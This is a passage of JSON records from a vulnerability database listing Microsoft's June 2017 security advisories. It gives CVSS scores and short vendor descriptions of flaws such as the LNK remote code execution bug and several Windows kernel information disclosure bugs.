"confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8470", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8470", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8470", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:23", "description": "A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed.\n\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. 
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nThe attacker could present to the user a removable drive, or remote share, that contains a malicious .LNK file and an associated malicious binary. When the user opens this drive (or remote share) in Windows Explorer, or any other application that parses the .LNK file, the malicious binary will execute code of the attacker\u2019s choice, on the target system.\n\nThe security update addresses the vulnerability by correcting the processing of shortcut LNK references.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "LNK Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8464", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8464", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", 
"description": "An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n\nThe update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Uniscribe Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0285", "CVE-2017-8529"], "modified": "2017-07-03T07:00:00", "id": "MS:CVE-2017-0285", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0285", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the 
Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8471", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8471", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8471", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:22", "description": "An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses the vulnerability by correcting how DirectX handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-19T07:00:00", "type": "mscve", "title": "DirectX Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8579", "CVE-2017-8529"], "modified": "2017-06-28T07:00:00", "id": "MS:CVE-2017-8579", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8579", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Microsoft Edge Fetch API incorrectly handles a filtered response type. 
An attacker could use the vulnerability to read the URL of a cross-origin request. Websites that do not securely populate the URL with confidential information could allow information to be disclosed to an attacker.\n\nTo exploit the vulnerability, in a web-based attack scenario, an attacker could host a website in an attempt to exploit the vulnerability. In addition, the user must be logged on to a website that does not securely populate URLs with confidential information. However, in all cases an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince the user to take action. For example, an attacker could trick a user into clicking a link that takes them to the attacker's site.\n\nThe update addresses the vulnerability by changing how the Fetch API in Microsoft Edge handles specific filtered response types.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Microsoft Edge Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", 
"CVE-2017-8504"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8504", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8504", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:22", "description": "A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft browsers and then convince a user to view the website. An attacker could also embed an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document that hosts the related rendering engine. The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nAn attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThe security update addresses the vulnerability by modifying how Microsoft browser JavaScript scripting engines handle objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8517", "CVE-2017-8529"], "modified": "2017-07-11T07:00:00", "id": "MS:CVE-2017-8517", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8517", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:23", "description": "An elevation of privilege vulnerability exists when Windows Hyper-V instruction emulation fails to properly enforce privilege levels. An attacker who successfully exploited this vulnerability could gain elevated privileges on a target guest operating system. 
The host operating system is not vulnerable to this attack.\n\nThis vulnerability by itself does not allow arbitrary code to be run. However, the vulnerability could be used in conjunction with one or more vulnerabilities (e.g. a remote code execution vulnerability and another elevation of privilege) that could take advantage of the elevated privileges when running.\n\nThe update addresses the vulnerability by correcting how privileges are enforced by Windows Hyper-V instruction emulation.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Hypervisor Code Integrity Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0193", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0193", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0193", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a 
Windows PowerShell session. An attacker who successfully exploited this vulnerability could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.\n\nTo exploit the vulnerability, an attacker would first have to access the local machine, and then inject malicious code into a script that is trusted by the Code Integrity policy. The injected code would then run with the same trust level as the script and bypass the Code Integrity policy.\n\nThe update addresses the vulnerability by correcting how PowerShell exposes functions and processes user supplied code.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0218", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0218", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0218", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8485", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8485", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8485", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when Windows Search handles objects in memory. 
An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit the vulnerability, an attacker could send specially crafted SMB messages to the Windows Search service.\n\nThe security update addresses the vulnerabilities by correcting how Windows Search handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Search Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8544", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8544", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8544", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. 
An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8483", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8483", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8483", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A tampering vulnerability exists in Microsoft Windows that could allow an authenticated attacker to modify the C:\\Users\\DEFAULT folder structure. 
An attacker who successfully exploited this vulnerability could potentially modify files and folders that are synchronized the first time when a user logs in locally to the computer.\n\nTo exploit this vulnerability, an attacker would need to log on to the affected system and tamper with the DEFAULT folder contents. An attacker can only exploit this vulnerability prior to a user logging on locally to the computer. Users who have logged on before the attacker attempts to exploit this vulnerability would not be affected.\n\nThe security update addresses the vulnerability by correcting permissions on folders inside the DEFAULT folder structure.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Default Folder Tampering Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0295", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0295", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0295", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": 
"2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8481", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8481", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8481", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this 
vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8480", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8480", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8480", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. 
An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8479", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8479", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8479", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address. 
